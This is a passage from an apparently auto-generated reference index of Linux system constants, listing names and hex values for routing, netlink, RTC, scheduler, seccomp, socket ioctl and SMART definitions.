RTCF_MASQ (line 2698) | RTCF_MASQ = 0x400000 constant RTCF_NAT (line 2699) | RTCF_NAT = 0x800000 constant RTCF_VALVE (line 2700) | RTCF_VALVE = 0x200000 constant RTC_AF (line 2701) | RTC_AF = 0x20 constant RTC_BSM_DIRECT (line 2702) | RTC_BSM_DIRECT = 0x1 constant RTC_BSM_DISABLED (line 2703) | RTC_BSM_DISABLED = 0x0 constant RTC_BSM_LEVEL (line 2704) | RTC_BSM_LEVEL = 0x2 constant RTC_BSM_STANDBY (line 2705) | RTC_BSM_STANDBY = 0x3 constant RTC_FEATURE_ALARM (line 2706) | RTC_FEATURE_ALARM = 0x0 constant RTC_FEATURE_ALARM_RES_2S (line 2707) | RTC_FEATURE_ALARM_RES_2S = 0x3 constant RTC_FEATURE_ALARM_RES_MINUTE (line 2708) | RTC_FEATURE_ALARM_RES_MINUTE = 0x1 constant RTC_FEATURE_ALARM_WAKEUP_ONLY (line 2709) | RTC_FEATURE_ALARM_WAKEUP_ONLY = 0x7 constant RTC_FEATURE_BACKUP_SWITCH_MODE (line 2710) | RTC_FEATURE_BACKUP_SWITCH_MODE = 0x6 constant RTC_FEATURE_CNT (line 2711) | RTC_FEATURE_CNT = 0x8 constant RTC_FEATURE_CORRECTION (line 2712) | RTC_FEATURE_CORRECTION = 0x5 constant RTC_FEATURE_NEED_WEEK_DAY (line 2713) | RTC_FEATURE_NEED_WEEK_DAY = 0x2 constant RTC_FEATURE_UPDATE_INTERRUPT (line 2714) | RTC_FEATURE_UPDATE_INTERRUPT = 0x4 constant RTC_IRQF (line 2715) | RTC_IRQF = 0x80 constant RTC_MAX_FREQ (line 2716) | RTC_MAX_FREQ = 0x2000 constant RTC_PARAM_BACKUP_SWITCH_MODE (line 2717) | RTC_PARAM_BACKUP_SWITCH_MODE = 0x2 constant RTC_PARAM_CORRECTION (line 2718) | RTC_PARAM_CORRECTION = 0x1 constant RTC_PARAM_FEATURES (line 2719) | RTC_PARAM_FEATURES = 0x0 constant RTC_PF (line 2720) | RTC_PF = 0x40 constant RTC_UF (line 2721) | RTC_UF = 0x10 constant RTF_ADDRCLASSMASK (line 2722) | RTF_ADDRCLASSMASK = 0xf8000000 constant RTF_ADDRCONF (line 2723) | RTF_ADDRCONF = 0x40000 constant RTF_ALLONLINK (line 2724) | RTF_ALLONLINK = 0x20000 constant RTF_BROADCAST (line 2725) | RTF_BROADCAST = 0x10000000 constant RTF_CACHE (line 2726) | RTF_CACHE = 0x1000000 constant RTF_DEFAULT (line 2727) | RTF_DEFAULT = 0x10000 constant RTF_DYNAMIC (line 2728) | RTF_DYNAMIC = 0x10 constant RTF_FLOW (line 2729) | RTF_FLOW = 0x2000000 constant RTF_GATEWAY (line 2730) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 2731) | RTF_HOST = 0x4 constant RTF_INTERFACE (line 2732) | RTF_INTERFACE = 0x40000000 constant RTF_IRTT (line 2733) | RTF_IRTT = 0x100 constant RTF_LINKRT (line 2734) | RTF_LINKRT = 0x100000 constant RTF_LOCAL (line 2735) | RTF_LOCAL = 0x80000000 constant RTF_MODIFIED (line 2736) | RTF_MODIFIED = 0x20 constant RTF_MSS (line 2737) | RTF_MSS = 0x40 constant RTF_MTU (line 2738) | RTF_MTU = 0x40 constant RTF_MULTICAST (line 2739) | RTF_MULTICAST = 0x20000000 constant RTF_NAT (line 2740) | RTF_NAT = 0x8000000 constant RTF_NOFORWARD (line 2741) | RTF_NOFORWARD = 0x1000 constant RTF_NONEXTHOP (line 2742) | RTF_NONEXTHOP = 0x200000 constant RTF_NOPMTUDISC (line 2743) | RTF_NOPMTUDISC = 0x4000 constant RTF_POLICY (line 2744) | RTF_POLICY = 0x4000000 constant RTF_REINSTATE (line 2745) | RTF_REINSTATE = 0x8 constant RTF_REJECT (line 2746) | RTF_REJECT = 0x200 constant RTF_STATIC (line 2747) | RTF_STATIC = 0x400 constant RTF_THROW (line 2748) | RTF_THROW = 0x2000 constant RTF_UP (line 2749) | RTF_UP = 0x1 constant RTF_WINDOW (line 2750) | RTF_WINDOW = 0x80 constant RTF_XRESOLVE (line 2751) | RTF_XRESOLVE = 0x800 constant RTMGRP_DECnet_IFADDR (line 2752) | RTMGRP_DECnet_IFADDR = 0x1000 constant RTMGRP_DECnet_ROUTE (line 2753) | RTMGRP_DECnet_ROUTE = 0x4000 constant RTMGRP_IPV4_IFADDR (line 2754) | RTMGRP_IPV4_IFADDR = 0x10 constant RTMGRP_IPV4_MROUTE (line 2755) | RTMGRP_IPV4_MROUTE = 0x20 constant RTMGRP_IPV4_ROUTE (line 2756) | RTMGRP_IPV4_ROUTE = 0x40 constant RTMGRP_IPV4_RULE (line 2757) | RTMGRP_IPV4_RULE = 0x80 constant RTMGRP_IPV6_IFADDR (line 2758) | RTMGRP_IPV6_IFADDR = 0x100 constant RTMGRP_IPV6_IFINFO (line 2759) | RTMGRP_IPV6_IFINFO = 0x800 constant RTMGRP_IPV6_MROUTE (line 2760) | RTMGRP_IPV6_MROUTE = 0x200 constant RTMGRP_IPV6_PREFIX (line 2761) | RTMGRP_IPV6_PREFIX = 0x20000 constant RTMGRP_IPV6_ROUTE (line 2762) | RTMGRP_IPV6_ROUTE = 0x400 constant RTMGRP_LINK (line 2763) | RTMGRP_LINK = 0x1 constant RTMGRP_NEIGH (line 2764) | RTMGRP_NEIGH = 0x4 constant RTMGRP_NOTIFY (line 2765) | RTMGRP_NOTIFY = 0x2 constant RTMGRP_TC (line 2766) | RTMGRP_TC = 0x8 constant RTM_BASE (line 2767) | RTM_BASE = 0x10 constant RTM_DELACTION (line 2768) | RTM_DELACTION = 0x31 constant RTM_DELADDR (line 2769) | RTM_DELADDR = 0x15 constant RTM_DELADDRLABEL (line 2770) | RTM_DELADDRLABEL = 0x49 constant RTM_DELCHAIN (line 2771) | RTM_DELCHAIN = 0x65 constant RTM_DELLINK (line 2772) | RTM_DELLINK = 0x11 constant RTM_DELLINKPROP (line 2773) | RTM_DELLINKPROP = 0x6d constant RTM_DELMDB (line 2774) | RTM_DELMDB = 0x55 constant RTM_DELNEIGH (line 2775) | RTM_DELNEIGH = 0x1d constant RTM_DELNETCONF (line 2776) | RTM_DELNETCONF = 0x51 constant RTM_DELNEXTHOP (line 2777) | RTM_DELNEXTHOP = 0x69 constant RTM_DELNEXTHOPBUCKET (line 2778) | RTM_DELNEXTHOPBUCKET = 0x75 constant RTM_DELNSID (line 2779) | RTM_DELNSID = 0x59 constant RTM_DELQDISC (line 2780) | RTM_DELQDISC = 0x25 constant RTM_DELROUTE (line 2781) | RTM_DELROUTE = 0x19 constant RTM_DELRULE (line 2782) | RTM_DELRULE = 0x21 constant RTM_DELTCLASS (line 2783) | RTM_DELTCLASS = 0x29 constant RTM_DELTFILTER (line 2784) | RTM_DELTFILTER = 0x2d constant RTM_DELTUNNEL (line 2785) | RTM_DELTUNNEL = 0x79 constant RTM_DELVLAN (line 2786) | RTM_DELVLAN = 0x71 constant RTM_F_CLONED (line 2787) | RTM_F_CLONED = 0x200 constant RTM_F_EQUALIZE (line 2788) | RTM_F_EQUALIZE = 0x400 constant RTM_F_FIB_MATCH (line 2789) | RTM_F_FIB_MATCH = 0x2000 constant RTM_F_LOOKUP_TABLE (line 2790) | RTM_F_LOOKUP_TABLE = 0x1000 constant RTM_F_NOTIFY (line 2791) | RTM_F_NOTIFY = 0x100 constant RTM_F_OFFLOAD (line 2792) | RTM_F_OFFLOAD = 0x4000 constant RTM_F_OFFLOAD_FAILED (line 2793) | RTM_F_OFFLOAD_FAILED = 0x20000000 constant RTM_F_PREFIX (line 2794) | RTM_F_PREFIX = 0x800 constant RTM_F_TRAP (line 2795) | RTM_F_TRAP = 0x8000 constant RTM_GETACTION (line 2796) | RTM_GETACTION = 0x32 constant RTM_GETADDR (line 2797) | RTM_GETADDR = 0x16 constant RTM_GETADDRLABEL (line 2798) | RTM_GETADDRLABEL = 0x4a constant RTM_GETANYCAST (line 2799) | RTM_GETANYCAST = 0x3e constant RTM_GETCHAIN (line 2800) | RTM_GETCHAIN = 0x66 constant RTM_GETDCB (line 2801) | RTM_GETDCB = 0x4e constant RTM_GETLINK (line 2802) | RTM_GETLINK = 0x12 constant RTM_GETLINKPROP (line 2803) | RTM_GETLINKPROP = 0x6e constant RTM_GETMDB (line 2804) | RTM_GETMDB = 0x56 constant RTM_GETMULTICAST (line 2805) | RTM_GETMULTICAST = 0x3a constant RTM_GETNEIGH (line 2806) | RTM_GETNEIGH = 0x1e constant RTM_GETNEIGHTBL (line 2807) | RTM_GETNEIGHTBL = 0x42 constant RTM_GETNETCONF (line 2808) | RTM_GETNETCONF = 0x52 constant RTM_GETNEXTHOP (line 2809) | RTM_GETNEXTHOP = 0x6a constant RTM_GETNEXTHOPBUCKET (line 2810) | RTM_GETNEXTHOPBUCKET = 0x76 constant RTM_GETNSID (line 2811) | RTM_GETNSID = 0x5a constant RTM_GETQDISC (line 2812) | RTM_GETQDISC = 0x26 constant RTM_GETROUTE (line 2813) | RTM_GETROUTE = 0x1a constant RTM_GETRULE (line 2814) | RTM_GETRULE = 0x22 constant RTM_GETSTATS (line 2815) | RTM_GETSTATS = 0x5e constant RTM_GETTCLASS (line 2816) | RTM_GETTCLASS = 0x2a constant RTM_GETTFILTER (line 2817) | RTM_GETTFILTER = 0x2e constant RTM_GETTUNNEL (line 2818) | RTM_GETTUNNEL = 0x7a constant RTM_GETVLAN (line 2819) | RTM_GETVLAN = 0x72 constant RTM_MAX (line 2820) | RTM_MAX = 0x7b constant RTM_NEWACTION (line 2821) | RTM_NEWACTION = 0x30 constant RTM_NEWADDR (line 2822) | RTM_NEWADDR = 0x14 constant RTM_NEWADDRLABEL (line 2823) | RTM_NEWADDRLABEL = 0x48 constant RTM_NEWCACHEREPORT (line 2824) | RTM_NEWCACHEREPORT = 0x60 constant RTM_NEWCHAIN (line 2825) | RTM_NEWCHAIN = 0x64 constant RTM_NEWLINK (line 2826) | RTM_NEWLINK = 0x10 constant RTM_NEWLINKPROP (line 2827) | RTM_NEWLINKPROP = 0x6c constant RTM_NEWMDB (line 2828) | RTM_NEWMDB = 0x54 constant RTM_NEWNDUSEROPT (line 2829) | RTM_NEWNDUSEROPT = 0x44 constant RTM_NEWNEIGH (line 2830) | RTM_NEWNEIGH = 0x1c constant RTM_NEWNEIGHTBL (line 2831) | RTM_NEWNEIGHTBL = 0x40 constant RTM_NEWNETCONF (line 2832) | RTM_NEWNETCONF = 0x50 constant RTM_NEWNEXTHOP (line 2833) | RTM_NEWNEXTHOP = 0x68 constant RTM_NEWNEXTHOPBUCKET (line 2834) | RTM_NEWNEXTHOPBUCKET = 0x74 constant RTM_NEWNSID (line 2835) | RTM_NEWNSID = 0x58 constant RTM_NEWNVLAN (line 2836) | RTM_NEWNVLAN = 0x70 constant RTM_NEWPREFIX (line 2837) | RTM_NEWPREFIX = 0x34 constant RTM_NEWQDISC (line 2838) | RTM_NEWQDISC = 0x24 constant RTM_NEWROUTE (line 2839) | RTM_NEWROUTE = 0x18 constant RTM_NEWRULE (line 2840) | RTM_NEWRULE = 0x20 constant RTM_NEWSTATS (line 2841) | RTM_NEWSTATS = 0x5c constant RTM_NEWTCLASS (line 2842) | RTM_NEWTCLASS = 0x28 constant RTM_NEWTFILTER (line 2843) | RTM_NEWTFILTER = 0x2c constant RTM_NEWTUNNEL (line 2844) | RTM_NEWTUNNEL = 0x78 constant RTM_NR_FAMILIES (line 2845) | RTM_NR_FAMILIES = 0x1b constant RTM_NR_MSGTYPES (line 2846) | RTM_NR_MSGTYPES = 0x6c constant RTM_SETDCB (line 2847) | RTM_SETDCB = 0x4f constant RTM_SETLINK (line 2848) | RTM_SETLINK = 0x13 constant RTM_SETNEIGHTBL (line 2849) | RTM_SETNEIGHTBL = 0x43 constant RTM_SETSTATS (line 2850) | RTM_SETSTATS = 0x5f constant RTNH_ALIGNTO (line 2851) | RTNH_ALIGNTO = 0x4 constant RTNH_COMPARE_MASK (line 2852) | RTNH_COMPARE_MASK = 0x59 constant RTNH_F_DEAD (line 2853) | RTNH_F_DEAD = 0x1 constant RTNH_F_LINKDOWN (line 2854) | RTNH_F_LINKDOWN = 0x10 constant RTNH_F_OFFLOAD (line 2855) | RTNH_F_OFFLOAD = 0x8 constant RTNH_F_ONLINK (line 2856) | RTNH_F_ONLINK = 0x4 constant RTNH_F_PERVASIVE (line 2857) | RTNH_F_PERVASIVE = 0x2 constant RTNH_F_TRAP (line 2858) | RTNH_F_TRAP = 0x40 constant RTNH_F_UNRESOLVED (line 2859) | RTNH_F_UNRESOLVED = 0x20 constant RTN_MAX (line 2860) | RTN_MAX = 0xb constant RTPROT_BABEL (line 2861) | RTPROT_BABEL = 0x2a constant RTPROT_BGP (line 2862) | RTPROT_BGP = 0xba constant RTPROT_BIRD (line 2863) | RTPROT_BIRD = 0xc constant RTPROT_BOOT (line 2864) | RTPROT_BOOT = 0x3 constant RTPROT_DHCP (line 2865) | RTPROT_DHCP = 0x10 constant RTPROT_DNROUTED (line 2866) | RTPROT_DNROUTED = 0xd constant RTPROT_EIGRP (line 2867) | RTPROT_EIGRP = 0xc0 constant RTPROT_GATED (line 2868) | RTPROT_GATED = 0x8 constant RTPROT_ISIS (line 2869) | RTPROT_ISIS = 0xbb constant RTPROT_KEEPALIVED (line 2870) | RTPROT_KEEPALIVED = 0x12 constant RTPROT_KERNEL (line 2871) | RTPROT_KERNEL = 0x2 constant RTPROT_MROUTED (line 2872) | RTPROT_MROUTED = 0x11 constant RTPROT_MRT (line 2873) | RTPROT_MRT = 0xa constant RTPROT_NTK (line 2874) | RTPROT_NTK = 0xf constant RTPROT_OPENR (line 2875) | RTPROT_OPENR = 0x63 constant RTPROT_OSPF (line 2876) | RTPROT_OSPF = 0xbc constant RTPROT_RA (line 2877) | RTPROT_RA = 0x9 constant RTPROT_REDIRECT (line 2878) | RTPROT_REDIRECT = 0x1 constant RTPROT_RIP (line 2879) | RTPROT_RIP = 0xbd constant RTPROT_STATIC (line 2880) | RTPROT_STATIC = 0x4 constant RTPROT_UNSPEC (line 2881) | RTPROT_UNSPEC = 0x0 constant RTPROT_XORP (line 2882) | RTPROT_XORP = 0xe constant RTPROT_ZEBRA (line 2883) | RTPROT_ZEBRA = 0xb constant RT_CLASS_DEFAULT (line 2884) | RT_CLASS_DEFAULT = 0xfd constant RT_CLASS_LOCAL (line 2885) | RT_CLASS_LOCAL = 0xff constant RT_CLASS_MAIN (line 2886) | RT_CLASS_MAIN = 0xfe constant RT_CLASS_MAX (line 2887) | RT_CLASS_MAX = 0xff constant RT_CLASS_UNSPEC (line 2888) | RT_CLASS_UNSPEC = 0x0 constant RUSAGE_CHILDREN (line 2889) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 2890) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 2891) | RUSAGE_THREAD = 0x1 constant RWF_APPEND (line 2892) | RWF_APPEND = 0x10 constant RWF_DSYNC (line 2893) | RWF_DSYNC = 0x2 constant RWF_HIPRI (line 2894) | RWF_HIPRI = 0x1 constant RWF_NOWAIT (line 2895) | RWF_NOWAIT = 0x8 constant RWF_SUPPORTED (line 2896) | RWF_SUPPORTED = 0x1f constant RWF_SYNC (line 2897) | RWF_SYNC = 0x4 constant RWF_WRITE_LIFE_NOT_SET (line 2898) | RWF_WRITE_LIFE_NOT_SET = 0x0 constant SCHED_BATCH (line 2899) | SCHED_BATCH = 0x3 constant SCHED_DEADLINE (line 2900) | SCHED_DEADLINE = 0x6 constant SCHED_FIFO (line 2901) | SCHED_FIFO = 0x1 constant SCHED_FLAG_ALL (line 2902) | SCHED_FLAG_ALL = 0x7f constant SCHED_FLAG_DL_OVERRUN (line 2903) | SCHED_FLAG_DL_OVERRUN = 0x4 constant SCHED_FLAG_KEEP_ALL (line 2904) | SCHED_FLAG_KEEP_ALL = 0x18 constant SCHED_FLAG_KEEP_PARAMS (line 2905) | SCHED_FLAG_KEEP_PARAMS = 0x10 constant SCHED_FLAG_KEEP_POLICY (line 2906) | SCHED_FLAG_KEEP_POLICY = 0x8 constant SCHED_FLAG_RECLAIM (line 2907) | SCHED_FLAG_RECLAIM = 0x2 constant SCHED_FLAG_RESET_ON_FORK (line 2908) | SCHED_FLAG_RESET_ON_FORK = 0x1 constant SCHED_FLAG_UTIL_CLAMP (line 2909) | SCHED_FLAG_UTIL_CLAMP = 0x60 constant SCHED_FLAG_UTIL_CLAMP_MAX (line 2910) | SCHED_FLAG_UTIL_CLAMP_MAX = 0x40 constant SCHED_FLAG_UTIL_CLAMP_MIN (line 2911) | SCHED_FLAG_UTIL_CLAMP_MIN = 0x20 constant SCHED_IDLE (line 2912) | SCHED_IDLE = 0x5 constant SCHED_NORMAL (line 2913) | SCHED_NORMAL = 0x0 constant SCHED_RESET_ON_FORK (line 2914) | SCHED_RESET_ON_FORK = 0x40000000 constant SCHED_RR (line 2915) | SCHED_RR = 0x2 constant SCM_CREDENTIALS (line 2916) | SCM_CREDENTIALS = 0x2 constant SCM_RIGHTS (line 2917) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 2918) | SCM_TIMESTAMP = 0x1d constant SC_LOG_FLUSH (line 2919) | SC_LOG_FLUSH = 0x100000 constant SECCOMP_ADDFD_FLAG_SEND (line 2920) | SECCOMP_ADDFD_FLAG_SEND = 0x2 constant SECCOMP_ADDFD_FLAG_SETFD (line 2921) | SECCOMP_ADDFD_FLAG_SETFD = 0x1 constant SECCOMP_FILTER_FLAG_LOG (line 2922) | SECCOMP_FILTER_FLAG_LOG = 0x2 constant SECCOMP_FILTER_FLAG_NEW_LISTENER (line 2923) | SECCOMP_FILTER_FLAG_NEW_LISTENER = 0x8 constant SECCOMP_FILTER_FLAG_SPEC_ALLOW (line 2924) | SECCOMP_FILTER_FLAG_SPEC_ALLOW = 0x4 constant SECCOMP_FILTER_FLAG_TSYNC (line 2925) | SECCOMP_FILTER_FLAG_TSYNC = 0x1 constant SECCOMP_FILTER_FLAG_TSYNC_ESRCH (line 2926) | SECCOMP_FILTER_FLAG_TSYNC_ESRCH = 0x10 constant SECCOMP_FILTER_FLAG_WAIT_KILLABLE_RECV (line 2927) | SECCOMP_FILTER_FLAG_WAIT_KILLABLE_RECV = 0x20 constant SECCOMP_GET_ACTION_AVAIL (line 2928) | SECCOMP_GET_ACTION_AVAIL = 0x2 constant SECCOMP_GET_NOTIF_SIZES (line 2929) | SECCOMP_GET_NOTIF_SIZES = 0x3 constant SECCOMP_IOCTL_NOTIF_RECV (line 2930) | SECCOMP_IOCTL_NOTIF_RECV = 0xc0502100 constant SECCOMP_IOCTL_NOTIF_SEND (line 2931) | SECCOMP_IOCTL_NOTIF_SEND = 0xc0182101 constant SECCOMP_IOC_MAGIC (line 2932) | SECCOMP_IOC_MAGIC = '!' constant SECCOMP_MODE_DISABLED (line 2933) | SECCOMP_MODE_DISABLED = 0x0 constant SECCOMP_MODE_FILTER (line 2934) | SECCOMP_MODE_FILTER = 0x2 constant SECCOMP_MODE_STRICT (line 2935) | SECCOMP_MODE_STRICT = 0x1 constant SECCOMP_RET_ACTION (line 2936) | SECCOMP_RET_ACTION = 0x7fff0000 constant SECCOMP_RET_ACTION_FULL (line 2937) | SECCOMP_RET_ACTION_FULL = 0xffff0000 constant SECCOMP_RET_ALLOW (line 2938) | SECCOMP_RET_ALLOW = 0x7fff0000 constant SECCOMP_RET_DATA (line 2939) | SECCOMP_RET_DATA = 0xffff constant SECCOMP_RET_ERRNO (line 2940) | SECCOMP_RET_ERRNO = 0x50000 constant SECCOMP_RET_KILL (line 2941) | SECCOMP_RET_KILL = 0x0 constant SECCOMP_RET_KILL_PROCESS (line 2942) | SECCOMP_RET_KILL_PROCESS = 0x80000000 constant SECCOMP_RET_KILL_THREAD (line 2943) | SECCOMP_RET_KILL_THREAD = 0x0 constant SECCOMP_RET_LOG (line 2944) | SECCOMP_RET_LOG = 0x7ffc0000 constant SECCOMP_RET_TRACE (line 2945) | SECCOMP_RET_TRACE = 0x7ff00000 constant SECCOMP_RET_TRAP (line 2946) | SECCOMP_RET_TRAP = 0x30000 constant SECCOMP_RET_USER_NOTIF (line 2947) | SECCOMP_RET_USER_NOTIF = 0x7fc00000 constant SECCOMP_SET_MODE_FILTER (line 2948) | SECCOMP_SET_MODE_FILTER = 0x1 constant SECCOMP_SET_MODE_STRICT (line 2949) | SECCOMP_SET_MODE_STRICT = 0x0 constant SECCOMP_USER_NOTIF_FD_SYNC_WAKE_UP (line 2950) | SECCOMP_USER_NOTIF_FD_SYNC_WAKE_UP = 0x1 constant SECCOMP_USER_NOTIF_FLAG_CONTINUE (line 2951) | SECCOMP_USER_NOTIF_FLAG_CONTINUE = 0x1 constant SECRETMEM_MAGIC (line 2952) | SECRETMEM_MAGIC = 0x5345434d constant SECURITYFS_MAGIC (line 2953) | SECURITYFS_MAGIC = 0x73636673 constant SEEK_CUR (line 2954) | SEEK_CUR = 0x1 constant SEEK_DATA (line 2955) | SEEK_DATA = 0x3 constant SEEK_END (line 2956) | SEEK_END = 0x2 constant SEEK_HOLE (line 2957) | SEEK_HOLE = 0x4 constant SEEK_MAX (line 2958) | SEEK_MAX = 0x4 constant SEEK_SET (line 2959) | SEEK_SET = 0x0 constant SELINUX_MAGIC (line 2960) | SELINUX_MAGIC = 0xf97cff8c constant SHUT_RD (line 2961) | SHUT_RD = 0x0 constant SHUT_RDWR (line 2962) | SHUT_RDWR = 0x2 constant SHUT_WR (line 2963) | SHUT_WR = 0x1 constant SIOCADDDLCI (line 2964) | SIOCADDDLCI = 0x8980 constant SIOCADDMULTI (line 2965) | SIOCADDMULTI = 0x8931 constant SIOCADDRT (line 2966) | SIOCADDRT = 0x890b constant SIOCBONDCHANGEACTIVE (line 2967) | SIOCBONDCHANGEACTIVE = 0x8995 constant SIOCBONDENSLAVE (line 2968) | SIOCBONDENSLAVE = 0x8990 constant SIOCBONDINFOQUERY (line 2969) | SIOCBONDINFOQUERY = 0x8994 constant SIOCBONDRELEASE (line 2970) | SIOCBONDRELEASE = 0x8991 constant SIOCBONDSETHWADDR (line 2971) | SIOCBONDSETHWADDR = 0x8992 constant SIOCBONDSLAVEINFOQUERY (line 2972) | SIOCBONDSLAVEINFOQUERY = 0x8993 constant SIOCBRADDBR (line 2973) | SIOCBRADDBR = 0x89a0 constant SIOCBRADDIF (line 2974) | SIOCBRADDIF = 0x89a2 constant SIOCBRDELBR (line 2975) | SIOCBRDELBR = 0x89a1 constant SIOCBRDELIF (line 2976) | SIOCBRDELIF = 0x89a3 constant SIOCDARP (line 2977) | SIOCDARP = 0x8953 constant SIOCDELDLCI (line 2978) | SIOCDELDLCI = 0x8981 constant SIOCDELMULTI (line 2979) | SIOCDELMULTI = 0x8932 constant SIOCDELRT (line 2980) | SIOCDELRT = 0x890c constant SIOCDEVPRIVATE (line 2981) | SIOCDEVPRIVATE = 0x89f0 constant SIOCDIFADDR (line 2982) | SIOCDIFADDR = 0x8936 constant SIOCDRARP (line 2983) | SIOCDRARP = 0x8960 constant SIOCETHTOOL (line 2984) | SIOCETHTOOL = 0x8946 constant SIOCGARP (line 2985) | SIOCGARP = 0x8954 constant SIOCGETLINKNAME (line 2986) | SIOCGETLINKNAME = 0x89e0 constant SIOCGETNODEID (line 2987) | SIOCGETNODEID = 0x89e1 constant SIOCGHWTSTAMP (line 2988) | SIOCGHWTSTAMP = 0x89b1 constant SIOCGIFADDR (line 2989) | SIOCGIFADDR = 0x8915 constant SIOCGIFBR (line 2990) | SIOCGIFBR = 0x8940 constant SIOCGIFBRDADDR (line 2991) | SIOCGIFBRDADDR = 0x8919 constant SIOCGIFCONF (line 2992) | SIOCGIFCONF = 0x8912 constant SIOCGIFCOUNT (line 2993) | SIOCGIFCOUNT = 0x8938 constant SIOCGIFDSTADDR (line 2994) | SIOCGIFDSTADDR = 0x8917 constant SIOCGIFENCAP (line 2995) | SIOCGIFENCAP = 0x8925 constant SIOCGIFFLAGS (line 2996) | SIOCGIFFLAGS = 0x8913 constant SIOCGIFHWADDR (line 2997) | SIOCGIFHWADDR = 0x8927 constant SIOCGIFINDEX (line 2998) | SIOCGIFINDEX = 0x8933 constant SIOCGIFMAP (line 2999) | SIOCGIFMAP = 0x8970 constant SIOCGIFMEM (line 3000) | SIOCGIFMEM = 0x891f constant SIOCGIFMETRIC (line 3001) | SIOCGIFMETRIC = 0x891d constant SIOCGIFMTU (line 3002) | SIOCGIFMTU = 0x8921 constant SIOCGIFNAME (line 3003) | SIOCGIFNAME = 0x8910 constant SIOCGIFNETMASK (line 3004) | SIOCGIFNETMASK = 0x891b constant SIOCGIFPFLAGS (line 3005) | SIOCGIFPFLAGS = 0x8935 constant SIOCGIFSLAVE (line 3006) | SIOCGIFSLAVE = 0x8929 constant SIOCGIFTXQLEN (line 3007) | SIOCGIFTXQLEN = 0x8942 constant SIOCGIFVLAN (line 3008) | SIOCGIFVLAN = 0x8982 constant SIOCGMIIPHY (line 3009) | SIOCGMIIPHY = 0x8947 constant SIOCGMIIREG (line 3010) | SIOCGMIIREG = 0x8948 constant SIOCGPPPCSTATS (line 3011) | SIOCGPPPCSTATS = 0x89f2 constant SIOCGPPPSTATS (line 3012) | SIOCGPPPSTATS = 0x89f0 constant SIOCGPPPVER (line 3013) | SIOCGPPPVER = 0x89f1 constant SIOCGRARP (line 3014) | SIOCGRARP = 0x8961 constant SIOCGSKNS (line 3015) | SIOCGSKNS = 0x894c constant SIOCGSTAMP (line 3016) | SIOCGSTAMP = 0x8906 constant SIOCGSTAMPNS (line 3017) | SIOCGSTAMPNS = 0x8907 constant SIOCGSTAMPNS_OLD (line 3018) | SIOCGSTAMPNS_OLD = 0x8907 constant SIOCGSTAMP_OLD (line 3019) | SIOCGSTAMP_OLD = 0x8906 constant SIOCKCMATTACH (line 3020) | SIOCKCMATTACH = 0x89e0 constant SIOCKCMCLONE (line 3021) | SIOCKCMCLONE = 0x89e2 constant SIOCKCMUNATTACH (line 3022) | SIOCKCMUNATTACH = 0x89e1 constant SIOCOUTQNSD (line 3023) | SIOCOUTQNSD = 0x894b constant SIOCPROTOPRIVATE (line 3024) | SIOCPROTOPRIVATE = 0x89e0 constant SIOCRTMSG (line 3025) | SIOCRTMSG = 0x890d constant SIOCSARP (line 3026) | SIOCSARP = 0x8955 constant SIOCSHWTSTAMP (line 3027) | SIOCSHWTSTAMP = 0x89b0 constant SIOCSIFADDR (line 3028) | SIOCSIFADDR = 0x8916 constant SIOCSIFBR (line 3029) | SIOCSIFBR = 0x8941 constant SIOCSIFBRDADDR (line 3030) | SIOCSIFBRDADDR = 0x891a constant SIOCSIFDSTADDR (line 3031) | SIOCSIFDSTADDR = 0x8918 constant SIOCSIFENCAP (line 3032) | SIOCSIFENCAP = 0x8926 constant SIOCSIFFLAGS (line 3033) | SIOCSIFFLAGS = 0x8914 constant SIOCSIFHWADDR (line 3034) | SIOCSIFHWADDR = 0x8924 constant SIOCSIFHWBROADCAST (line 3035) | SIOCSIFHWBROADCAST = 0x8937 constant SIOCSIFLINK (line 3036) | SIOCSIFLINK = 0x8911 constant SIOCSIFMAP (line 3037) | SIOCSIFMAP = 0x8971 constant SIOCSIFMEM (line 3038) | SIOCSIFMEM = 0x8920 constant SIOCSIFMETRIC (line 3039) | SIOCSIFMETRIC = 0x891e constant SIOCSIFMTU (line 3040) | SIOCSIFMTU = 0x8922 constant SIOCSIFNAME (line 3041) | SIOCSIFNAME = 0x8923 constant SIOCSIFNETMASK (line 3042) | SIOCSIFNETMASK = 0x891c constant SIOCSIFPFLAGS (line 3043) | SIOCSIFPFLAGS = 0x8934 constant SIOCSIFSLAVE (line 3044) | SIOCSIFSLAVE = 0x8930 constant SIOCSIFTXQLEN (line 3045) | SIOCSIFTXQLEN = 0x8943 constant SIOCSIFVLAN (line 3046) | SIOCSIFVLAN = 0x8983 constant SIOCSMIIREG (line 3047) | SIOCSMIIREG = 0x8949 constant SIOCSRARP (line 3048) | SIOCSRARP = 0x8962 constant SIOCWANDEV (line 3049) | SIOCWANDEV = 0x894a constant SMACK_MAGIC (line 3050) | SMACK_MAGIC = 0x43415d53 constant SMART_AUTOSAVE (line 3051) | SMART_AUTOSAVE = 0xd2 constant SMART_AUTO_OFFLINE (line 3052) | SMART_AUTO_OFFLINE = 0xdb constant SMART_DISABLE (line 3053) | SMART_DISABLE = 0xd9 constant SMART_ENABLE (line 3054) | SMART_ENABLE = 0xd8 constant SMART_HCYL_PASS (line 3055) | SMART_HCYL_PASS = 0xc2 constant SMART_IMMEDIATE_OFFLINE (line 3056) | SMART_IMMEDIATE_OFFLINE = 0xd4 constant SMART_LCYL_PASS (line 3057) | SMART_LCYL_PASS = 0x4f constant SMART_READ_LOG_SECTOR (line 3058) | SMART_READ_LOG_SECTOR = 0xd5 constant SMART_READ_THRESHOLDS (line 3059) | SMART_READ_THRESHOLDS = 0xd1 constant SMART_READ_VALUES (line 3060) | SMART_READ_VALUES = 0xd0 constant SMART_SAVE (line 3061) | SMART_SAVE = 0xd3 constant SMART_STATUS (line 3062) | SMART_STATUS = 0xda constant SMART_WRITE_LOG_SECTOR (line 3063) | SMART_WRITE_LOG_SECTOR = 0xd6 constant SMART_WRITE_THRESHOLDS (line 3064) | SMART_WRITE_THRESHOLDS = 0xd7 constant SMB2_SUPER_MAGIC (line 3065) | SMB2_SUPER_MAGIC = 0xfe534d42 constant SMB_SUPER_MAGIC (line 3066) | SMB_SUPER_MAGIC = 0x517b constant SOCKFS_MAGIC (line 3067) | SOCKFS_MAGIC = 0x534f434b constant SOCK_BUF_LOCK_MASK (line 3068) | SOCK_BUF_LOCK_MASK = 0x3 constant SOCK_DCCP (line 3069) | SOCK_DCCP = 0x6 constant 